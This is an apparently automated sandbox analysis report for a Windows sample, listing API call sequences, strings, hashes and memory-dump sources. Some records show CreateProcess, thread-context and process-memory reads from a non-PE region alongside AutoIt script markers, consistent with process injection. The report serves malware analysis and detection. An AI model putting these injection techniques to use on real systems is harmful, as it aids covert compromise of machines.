                                                                  • Opcode Fuzzy Hash: d4653c46a9c0f32715524e30a30efc68b352f499549c5d278cc1b9abe4ea2ec9
                                                                  • Instruction Fuzzy Hash: 25F05E71626694BEEA3167236C1DF3B3E7DD7C6F60F02422EB914B2270C2710840EAB0

                                                                  Control-flow Graph

                                                                  APIs
                                                                    • Part of subcall function 01415100: Sleep.KERNELBASE(000001F4), ref: 01415111
                                                                  • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 0141533E
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1285208597.0000000001412000.00000040.00000020.00020000.00000000.sdmp, Offset: 01412000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_1412000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: CreateFileSleep
                                                                  • String ID: FJEN375KJ8P1S6KL1POJKMGVTY
                                                                  • API String ID: 2694422964-3339406231
                                                                  • Opcode ID: 42afd21685fb0b3a0ed8e2d3bbb5a697352c3c207b23c5ee75ed8cfc1d191350
                                                                  • Instruction ID: 8aa924665fe18c6b6aab35a6e239f4ee0e9245b668c68de3bc4ba8c05f09da73
                                                                  • Opcode Fuzzy Hash: 42afd21685fb0b3a0ed8e2d3bbb5a697352c3c207b23c5ee75ed8cfc1d191350
                                                                  • Instruction Fuzzy Hash: 23518170D0428CDAEF12DBA4C858BDFBB78AF55304F044199E6497B2C1C7B90B49CBA6

                                                                  Control-flow Graph

                                                                  APIs
                                                                  • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 0092D3D7
                                                                    • Part of subcall function 008F7BCC: _memmove.LIBCMT ref: 008F7C06
                                                                  • _memset.LIBCMT ref: 008F40FC
                                                                  • _wcscpy.LIBCMT ref: 008F4150
                                                                  • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 008F4160
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: IconLoadNotifyShell_String_memmove_memset_wcscpy
                                                                  • String ID: Line:
                                                                  • API String ID: 3942752672-1585850449
                                                                  • Opcode ID: 0ca42af29789b205aa293ae5aee1d220413e66b8cb3311079fb8afab63a46d34
                                                                  • Instruction ID: 84af585614ea8514dbe1f568812ff2fd6b6daf7abfa67109087e0cab3bca12e1
                                                                  • Opcode Fuzzy Hash: 0ca42af29789b205aa293ae5aee1d220413e66b8cb3311079fb8afab63a46d34
                                                                  • Instruction Fuzzy Hash: 3C31AE71009708ABE361EB74E845BEB77D8FF84314F10461AF695D20A1EB709658CB93

                                                                  Control-flow Graph

                                                                  APIs
                                                                    • Part of subcall function 008F4DDD: LoadLibraryExW.KERNEL32(?,00000000,00000002,?,009B52F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 008F4E0F
                                                                  • _free.LIBCMT ref: 0092E263
                                                                  • _free.LIBCMT ref: 0092E2AA
                                                                    • Part of subcall function 008F6A8C: SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 008F6BAD
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: _free$CurrentDirectoryLibraryLoad
                                                                  • String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
                                                                  • API String ID: 2861923089-1757145024
                                                                  • Opcode ID: 3c72fc30779521b288846e31eb548a4fc8c50255efe2dba5d820ab4246bfd546
                                                                  • Instruction ID: b51d5a8e8a6ebce3110894a977fef2ade8ecbed23b5f01b88e7e06aaea3486b1
                                                                  • Opcode Fuzzy Hash: 3c72fc30779521b288846e31eb548a4fc8c50255efe2dba5d820ab4246bfd546
                                                                  • Instruction Fuzzy Hash: 94918F7190422DEFCF04EFA4E8919EDB7B8FF05310B10442AF916EB2A1DB749955CB51
                                                                  APIs
                                                                  • RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,008F35A1,SwapMouseButtons,00000004,?), ref: 008F35D4
                                                                  • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,008F35A1,SwapMouseButtons,00000004,?,?,?,?,008F2754), ref: 008F35F5
                                                                  • RegCloseKey.KERNELBASE(00000000,?,?,008F35A1,SwapMouseButtons,00000004,?,?,?,?,008F2754), ref: 008F3617
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: CloseOpenQueryValue
                                                                  • String ID: Control Panel\Mouse
                                                                  • API String ID: 3677997916-824357125
                                                                  • Opcode ID: 923d407931d134faf1051d8be6293dff1a1b89b4fc50f359aa176e2779fa225c
                                                                  • Instruction ID: 4d07596c27334d282be53e633a17361c00ae312d80550635a907e3cc1aefc7bc
                                                                  • Opcode Fuzzy Hash: 923d407931d134faf1051d8be6293dff1a1b89b4fc50f359aa176e2779fa225c
                                                                  • Instruction Fuzzy Hash: 3511457161420CBFDF218FA4DC80ABEBBB8FF15744F008469E909E7210E2719E40ABA0
                                                                  APIs
                                                                  • CreateProcessW.KERNELBASE(?,00000000), ref: 014148BB
                                                                  • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 01414951
                                                                  • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 01414973
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1285208597.0000000001412000.00000040.00000020.00020000.00000000.sdmp, Offset: 01412000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_1412000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                                  • String ID:
                                                                  • API String ID: 2438371351-0
                                                                  • Opcode ID: 91de96a0508c6d9b88b93d6c14255c09b3dee72855056c89e06ebe7f8a996ab2
                                                                  • Instruction ID: 5530a69e29ed8e60161b461c8bf78bc3cfa86a67ba90cf7fafd16f0ecb4c13d9
                                                                  • Opcode Fuzzy Hash: 91de96a0508c6d9b88b93d6c14255c09b3dee72855056c89e06ebe7f8a996ab2
                                                                  • Instruction Fuzzy Hash: 3662FC30A14258DBEB24CFA4C850BDEB776EF58300F1491A9D10DEB3A4E7769E81CB59
                                                                  APIs
                                                                    • Part of subcall function 008F4EE5: _fseek.LIBCMT ref: 008F4EFD
                                                                    • Part of subcall function 00959734: _wcscmp.LIBCMT ref: 00959824
                                                                    • Part of subcall function 00959734: _wcscmp.LIBCMT ref: 00959837
                                                                  • _free.LIBCMT ref: 009596A2
                                                                  • _free.LIBCMT ref: 009596A9
                                                                  • _free.LIBCMT ref: 00959714
                                                                    • Part of subcall function 00912D55: RtlFreeHeap.NTDLL(00000000,00000000,?,00919A24), ref: 00912D69
                                                                    • Part of subcall function 00912D55: GetLastError.KERNEL32(00000000,?,00919A24), ref: 00912D7B
                                                                  • _free.LIBCMT ref: 0095971C
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
                                                                  • String ID:
                                                                  • API String ID: 1552873950-0
                                                                  • Opcode ID: 83a1bf45cb5b46f0fbbb2b282febcfcf75e63ad05b5baa694a85d9b23f0f737c
                                                                  • Instruction ID: f119e3f24f01ca0b2d8ffd1ab7199e3bc45b1e496a5e2768e692b962ac1a7715
                                                                  • Opcode Fuzzy Hash: 83a1bf45cb5b46f0fbbb2b282febcfcf75e63ad05b5baa694a85d9b23f0f737c
                                                                  • Instruction Fuzzy Hash: 75513EB1904258ABDF24DF65DC81AAEBBB9FF88300F10449EF609A3241DB715A94CF59
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: __flsbuf__flush__getptd_noexit__write_memmove
                                                                  • String ID:
                                                                  • API String ID: 2782032738-0
                                                                  • Opcode ID: 998aeda2236a74d80706e5f9a46343bd1135ee917ddd04e378ba6ed458c3dace
                                                                  • Instruction ID: 0f3370a3a81bcfad9f5392104776f8a7e782e03f3d645ca2ac60e8448889106d
                                                                  • Opcode Fuzzy Hash: 998aeda2236a74d80706e5f9a46343bd1135ee917ddd04e378ba6ed458c3dace
                                                                  • Instruction Fuzzy Hash: 4E41B675B0074E9BDB18CE69D8809EE77A9EF8A360B24857DE819CB680D770DDC18B50
                                                                  APIs
                                                                  • _memset.LIBCMT ref: 008F44CF
                                                                    • Part of subcall function 008F407C: _memset.LIBCMT ref: 008F40FC
                                                                    • Part of subcall function 008F407C: _wcscpy.LIBCMT ref: 008F4150
                                                                    • Part of subcall function 008F407C: Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 008F4160
                                                                  • KillTimer.USER32(?,00000001,?,?), ref: 008F4524
                                                                  • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 008F4533
                                                                  • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 0092D4B9
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
                                                                  • String ID:
                                                                  • API String ID: 1378193009-0
                                                                  • Opcode ID: 934fae22622c98b09ddc1f9bf911c6c844af8812bbd7c8ca3e80ec205acad91b
                                                                  • Instruction ID: 47e53414b7f9b7f8883b29e5dfda26b9216daa1fd23e9cdcb4c1fc6dc649896e
                                                                  • Opcode Fuzzy Hash: 934fae22622c98b09ddc1f9bf911c6c844af8812bbd7c8ca3e80ec205acad91b
                                                                  • Instruction Fuzzy Hash: 79212570909798AFE732AB349855BF7BBECEF05314F04008EE39E96191C3742A84DB51
                                                                  APIs
                                                                  • _memset.LIBCMT ref: 0092EA39
                                                                  • GetOpenFileNameW.COMDLG32(?), ref: 0092EA83
                                                                    • Part of subcall function 008F4750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,008F4743,?,?,008F37AE,?), ref: 008F4770
                                                                    • Part of subcall function 00910791: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 009107B0
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: Name$Path$FileFullLongOpen_memset
                                                                  • String ID: X
                                                                  • API String ID: 3777226403-3081909835
                                                                  • Opcode ID: 276af76f0da2b8071ea9555c3d3d54875edc9519a3d384bf58d5eb6d5fafb4cd
                                                                  • Instruction ID: 2e880480b1873e9fcaa301550ecf13ffe4e3332cf8f0eb8d7db096f3743a41ae
                                                                  • Opcode Fuzzy Hash: 276af76f0da2b8071ea9555c3d3d54875edc9519a3d384bf58d5eb6d5fafb4cd
                                                                  • Instruction Fuzzy Hash: 6C21C331A1425C9BDF119FA8DC45BEE7BFCAF49314F00401AE508EB241DFB459898FA2
                                                                  APIs
                                                                  • GetTempPathW.KERNEL32(00000104,?), ref: 009598F8
                                                                  • GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 0095990F
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: Temp$FileNamePath
                                                                  • String ID: aut
                                                                  • API String ID: 3285503233-3010740371
                                                                  • Opcode ID: 88f13241d0e4b55917c9415851a6e73efbe58a0da9777b8efedd9742eebc3d1b
                                                                  • Instruction ID: 1140b90e7795457f4ad37092015294fb0c57a60c82ccf7c3f4114b8197ac4c94
                                                                  • Opcode Fuzzy Hash: 88f13241d0e4b55917c9415851a6e73efbe58a0da9777b8efedd9742eebc3d1b
                                                                  • Instruction Fuzzy Hash: 73D05B7654430D6BDB50DB94DC0DF96773CE704704F0002B1BA64910A1ED7055949B91
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 14d2c07337deecc009e24e38d5919722fb9eeb58ad49fed32f5df66594d678b1
                                                                  • Instruction ID: 5617a55641e4d5e739a21f2dc273a6d36c7a0aadc8f5d5b5d023f4e14aae72ea
                                                                  • Opcode Fuzzy Hash: 14d2c07337deecc009e24e38d5919722fb9eeb58ad49fed32f5df66594d678b1
                                                                  • Instruction Fuzzy Hash: 16F159B1A083059FCB14DF28C484A6ABBE5FF88314F14892EF9999B351D731E945CF82
                                                                  APIs
                                                                    • Part of subcall function 00910162: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00910193
                                                                    • Part of subcall function 00910162: MapVirtualKeyW.USER32(00000010,00000000), ref: 0091019B
                                                                    • Part of subcall function 00910162: MapVirtualKeyW.USER32(000000A0,00000000), ref: 009101A6
                                                                    • Part of subcall function 00910162: MapVirtualKeyW.USER32(000000A1,00000000), ref: 009101B1
                                                                    • Part of subcall function 00910162: MapVirtualKeyW.USER32(00000011,00000000), ref: 009101B9
                                                                    • Part of subcall function 00910162: MapVirtualKeyW.USER32(00000012,00000000), ref: 009101C1
                                                                    • Part of subcall function 009060F9: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,008FF930), ref: 00906154
                                                                  • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 008FF9CD
                                                                  • OleInitialize.OLE32(00000000), ref: 008FFA4A
                                                                  • CloseHandle.KERNEL32(00000000), ref: 009345C8
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                                                                  • String ID:
                                                                  • API String ID: 1986988660-0
                                                                  • Opcode ID: cf67b8d8d0025490ad15886254cefb0856704743bd82ff1c90297784d1689544
                                                                  • Instruction ID: 3e79d4be74bdef4ced54ea4978f8f30970183f69687e95b23a2610604dd3785f
                                                                  • Opcode Fuzzy Hash: cf67b8d8d0025490ad15886254cefb0856704743bd82ff1c90297784d1689544
                                                                  • Instruction Fuzzy Hash: 7681E4B0929B40CFC395EF39AB957597BE6FB48326752822AD009C7371EB704485EF11
                                                                  APIs
                                                                  • _memset.LIBCMT ref: 008F4370
                                                                  • Shell_NotifyIconW.SHELL32(00000000,?), ref: 008F4415
                                                                  • Shell_NotifyIconW.SHELL32(00000001,?), ref: 008F4432
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: IconNotifyShell_$_memset
                                                                  • String ID:
                                                                  • API String ID: 1505330794-0
                                                                  • Opcode ID: f68e9c56e6cd2d8fd87890997d7903cd553f6b29a5599bd79e28db64e50e3f45
                                                                  • Instruction ID: 1c73fa40d48071f4ce138ffc07739feebded53e666d4ec74785aa13105a57a82
                                                                  • Opcode Fuzzy Hash: f68e9c56e6cd2d8fd87890997d7903cd553f6b29a5599bd79e28db64e50e3f45
                                                                  • Instruction Fuzzy Hash: 4D3193715197059FC720DF34D884BABBBF8FB58318F000A2EE69AD2351E771A944CB52
APIs
• __FF_MSGBANNER.LIBCMT ref: 00915733
  • Part of subcall function 0091A16B: __NMSG_WRITE.LIBCMT ref: 0091A192
  • Part of subcall function 0091A16B: __NMSG_WRITE.LIBCMT ref: 0091A19C
• __NMSG_WRITE.LIBCMT ref: 0091573A
  • Part of subcall function 0091A1C8: GetModuleFileNameW.KERNEL32(00000000,009B33BA,00000104,?,00000001,00000000), ref: 0091A25A
  • Part of subcall function 0091A1C8: ___crtMessageBoxW.LIBCMT ref: 0091A308
  • Part of subcall function 0091309F: ___crtCorExitProcess.LIBCMT ref: 009130A5
  • Part of subcall function 0091309F: ExitProcess.KERNEL32 ref: 009130AE
  • Part of subcall function 00918B28: __getptd_noexit.LIBCMT ref: 00918B28
• RtlAllocateHeap.NTDLL(01380000,00000000,00000001,00000000,?,?,?,00910DD3,?), ref: 0091575F
Memory Dump Source
• Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
• Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
Similarity
• API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
• String ID:
• API String ID: 1372826849-0
APIs
• CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,?,?,00959548,?,?,?,?,?,00000004), ref: 009598BB
• SetFileTime.KERNELBASE(00000000,?,00000000,?,?,00959548,?,?,?,?,?,00000004,00000001,?,?,00000004), ref: 009598D1
• CloseHandle.KERNEL32(00000000,?,00959548,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 009598D8
Memory Dump Source
• Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
• Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
Similarity
• API ID: File$CloseCreateHandleTime
• String ID:
• API String ID: 3397143404-0
APIs
• _free.LIBCMT ref: 00958D1B
  • Part of subcall function 00912D55: RtlFreeHeap.NTDLL(00000000,00000000,?,00919A24), ref: 00912D69
  • Part of subcall function 00912D55: GetLastError.KERNEL32(00000000,?,00919A24), ref: 00912D7B
• _free.LIBCMT ref: 00958D2C
• _free.LIBCMT ref: 00958D3E
Memory Dump Source
• Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
• Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
Similarity
• API ID: _free$ErrorFreeHeapLast
• String ID:
• API String ID: 776569668-0
Strings
Memory Dump Source
• Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
• Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
Similarity
• API ID:
• String ID: CALL
• API String ID: 0-4196123274
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
• Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
Similarity
• API ID: _memmove
• String ID: EA06
• API String ID: 4104443479-3962188686
APIs
Memory Dump Source
• Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
• Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
Similarity
• API ID: _memmove
• String ID:
• API String ID: 4104443479-0
APIs
• IsThemeActive.UXTHEME ref: 008F4834
